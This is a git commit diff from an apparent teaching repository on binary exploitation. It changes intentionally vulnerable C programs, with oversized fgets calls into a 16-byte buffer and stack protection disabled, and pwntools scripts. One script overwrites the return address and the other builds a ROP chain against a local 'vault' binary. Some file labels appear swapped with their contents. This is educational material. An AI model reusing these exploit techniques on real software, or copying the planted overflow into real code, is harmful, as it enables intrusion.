Fix buffer overflow example and add rop chaining example

Author: qhdwight

buffer_overflow/buffer_overflow

@@ -15,7 +15,5 @@ int main()
 
   fgets(input_buffer, 32, stdin); // Nothing can go wrong here right?
 
-  puts("HAHA you thought! There was no password, you can NEVER get in >:)");
-
   return EXIT_SUCCESS;
 }

buffer_overflow/buffer_overflow.c

@@ -2,56 +2,68 @@
 
 from pwn import *
 
-ACCESS_VAULT_FUNCTION_ADDR = 0x00401146
-
-# Tell pwntools our target process to automate future functions
-elf = context.binary = ELF('buffer_overflow')
-
-io = process()  # Actually start running the process
-
-# Wait until we are prompted with input
-# Notice how we use the "b" literal to mark it as a bytes object
-# https://docs.python.org/3/library/stdtypes.html#binary-sequence-types-bytes-bytearray-memoryview
-io.recvuntil(b"Enter the password to access Santa Ono's secret vault:")
-
-# "disassemble main" in GDB launched with "gdb buffer_overflow"
-# Dump of assembler code for function main:
-#    0x0000000000401175 <+0>:     push   rbp
-#    0x0000000000401176 <+1>:     mov    rbp,rsp
-#    0x0000000000401179 <+4>:     sub    rsp,0x10
-#    0x000000000040117d <+8>:     lea    rax,[rip+0xe9c]            # 0x402020
-#    0x0000000000401184 <+15>:    mov    rdi,rax
-#    0x0000000000401187 <+18>:    call   0x401030 <puts@plt>
-#    0x000000000040118c <+23>:    mov    rdx,QWORD PTR [rip+0x2ead] # 0x404040 <stdin@GLIBC_2.2.5>
-#    0x0000000000401193 <+30>:    lea    rax,[rbp-0x10]
-#    0x0000000000401197 <+34>:    mov    esi,0x20
-#    0x000000000040119c <+39>:    mov    rdi,rax
-#    0x000000000040119f <+42>:    call   0x401040 <fgets@plt>
-#    0x00000000004011a4 <+47>:    lea    rax,[rip+0xead]            # 0x402058
-#    0x00000000004011ab <+54>:    mov    rdi,rax
-#    0x00000000004011ae <+57>:    call   0x401030 <puts@plt>
-#    0x00000000004011b3 <+62>:    mov    eax,0x0
-#    0x00000000004011b8 <+67>:    leave
-#    0x00000000004011b9 <+68>:    ret                           <----- reads our injected return address!
-
-# In assembly you can read "sub rsp,0x10" at the start of "main"
-# We need to write past 0x10 bytes to start modifying maliciously
-dummy_data = b'A' * 0x10
-# The saved ebp doesn't really matter
-# We only execute one other function which doesn't need it
-saved_ebp = b'B' * 8
-# We have to pack the address properly (endianess!)
-redirect_addr = p64(ACCESS_VAULT_FUNCTION_ADDR)
-# Craft the final bytes payload
-payload = dummy_data + saved_ebp + redirect_addr
-
-# Overflow stack and get redirection
-# fgets will write past the end of the stack frame
-# It will set the return eip on the stack
-# The "ret" instruction will use this to go to our address
-io.send(payload)
-
-# Open up stdin to terminal input
-# Required so you can start using the shell interactively
-# Generally speaking you add this after popping a shell
-io.interactive()
+import argparse
+
+ACCESS_VAULT_FUNCTION_ADDR = 0x0000000000401176
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser()
+    parser.add_argument('--debug', action='store_true')
+
+    args = parser.parse_args()
+
+    # Tell pwntools our target process to automate future functions
+    elf = context.binary = ELF('buffer_overflow')
+
+    if args.debug:
+        io = gdb.debug(context.binary.path, '''
+        set follow-fork-mode child
+        break main
+        continue
+        ''')
+    else:
+        io = process()  # Actually start running the process
+
+    # Wait until we are prompted with input
+    # Notice how we use the "b" literal to mark it as a bytes object
+    # https://docs.python.org/3/library/stdtypes.html#binary-sequence-types-bytes-bytearray-memoryview
+    io.recvuntil(b"Enter the password to access Santa Ono's secret vault:")
+
+    # "disassemble main" in GDB launched with "gdb buffer_overflow"
+    # Dump of assembler code for function main:
+    #    0x00000000004011a3 <+0>:	endbr64
+    #    0x00000000004011a7 <+4>:	push   rbp
+    #    0x00000000004011a8 <+5>:	mov    rbp,rsp
+    #    0x00000000004011ab <+8>:	sub    rsp,0x10
+    #    0x00000000004011af <+12>:	lea    rdi,[rip+0xe6a]              # 0x402020
+    #    0x00000000004011b6 <+19>:	call   0x401060 <puts@plt>
+    #    0x00000000004011bb <+24>:	mov    rdx,QWORD PTR [rip+0x2e7e]   # 0x404040 <stdin@@GLIBC_2.2.5>
+    #    0x00000000004011c2 <+31>:	lea    rax,[rbp-0x10]
+    #    0x00000000004011c6 <+35>:	mov    esi,0x20
+    #    0x00000000004011cb <+40>:	mov    rdi,rax
+    #    0x00000000004011ce <+43>:	call   0x401070 <fgets@plt>
+    #    0x00000000004011d3 <+48>:	mov    eax,0x0
+    #    0x00000000004011d8 <+53>:	leave
+    #    0x00000000004011d9 <+54>:	ret    <-- returns to our injected address
+
+    # In assembly you can read "sub rsp,0x10" at the start of "main"
+    # We need to write past 0x10 bytes to start modifying maliciously
+    dummy_data = b'A' * 0x10
+    # The saved ebp doesn't really matter
+    # We only execute one other function which doesn't need it
+    saved_ebp = b'B' * 0x8
+    # We have to pack the address properly (endianess!)
+    redirect_addr = p64(ACCESS_VAULT_FUNCTION_ADDR)
+    # Craft the final bytes payload
+    payload = dummy_data + saved_ebp + redirect_addr
+
+    # Overflow stack and get redirection
+    # fgets will write past the end of the stack frame
+    # It will set the return eip on the stack
+    # The "ret" instruction will use this to go to our address
+    io.send(payload)
+
+    # Open up stdin to terminal input
+    # Required so you can start using the shell interactively
+    # Generally speaking you add this after popping a shell
+    io.interactive()

buffer_overflow/solve.py

@@ -1,9 +1,8 @@
 CC=gcc
-CFLAGS=-I. -fno-stack-protector -no-pie -Wno-stringop-overflow -Wno-nonnull -static
+CFLAGS=-I. -no-pie -Wno-stringop-overflow -Wno-nonnull -fno-stack-protector
 
-# Statically linked to give more gadgets
-buffer_overflow: rop.c
-	$(CC) $(CFLAGS) -o rop rop.c
+rop_chaining: rop_chaining.c
+	$(CC) $(CFLAGS) -o rop_chaining rop_chaining.c
 
 clean:
-	$(RM) rop
+	$(RM) rop_chaining

rop_chaining/Makefile

@@ -16,9 +16,7 @@ int main()
   char input_buffer[16];
   puts("Enter the password to access Santa Ono's secret vault:");
 
-  fgets(input_buffer, 32, stdin); // Nothing can go wrong here right?
-
-  puts("HAHA you thought! There was no password, you can NEVER get in >:)");
+  fgets(input_buffer, 64, stdin); // Nothing can go wrong here right?
 
   return EXIT_SUCCESS;
 }

rop_chaining/rop_chaining

@@ -2,22 +2,34 @@
 
 from pwn import *
 
-REGISTER_GADGET = 0x401df2
-ACCESS_VAULT_FUNCTION_ADDR = 0x4016fd
+import argparse
 
-elf = context.binary = ELF('rop')
-context.terminal = 'kitty'
 
-# io = process()
-io = gdb.debug('bash', '''
-break main
-continue
-''')
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser()
+    parser.add_argument('--debug', action='store_true')
 
-io.recvuntil(b"Enter the password to access Santa Ono's secret vault:")
+    args = parser.parse_args()
 
-payload = b'A' * 0x18 + p64(REGISTER_GADGET) + p64(1337) + p64(ACCESS_VAULT_FUNCTION_ADDR)
+    POP_EDI_GADGET_ADDR = 0x0000000000401253
+    ACCESS_VAULT_FUNCTION_ADDR = 0x0000000000401176
 
-# io.send(payload)
+    elf = context.binary = ELF('rop_chaining')
 
-# io.interactive()
+    if args.debug:
+        io = gdb.debug(context.binary.path, '''
+        set follow-fork-mode child
+        break main
+        continue
+        ''')
+    else:
+        io = process()  # Actually start running the process
+
+    io.recvuntil(b"Enter the password to access Santa Ono's secret vault:")
+
+    payload = (b'A' * 0x10 + b'B' * 0x8 +
+               p64(POP_EDI_GADGET_ADDR) + p64(1337) + p64(ACCESS_VAULT_FUNCTION_ADDR))
+
+    io.send(payload)
+
+    io.interactive()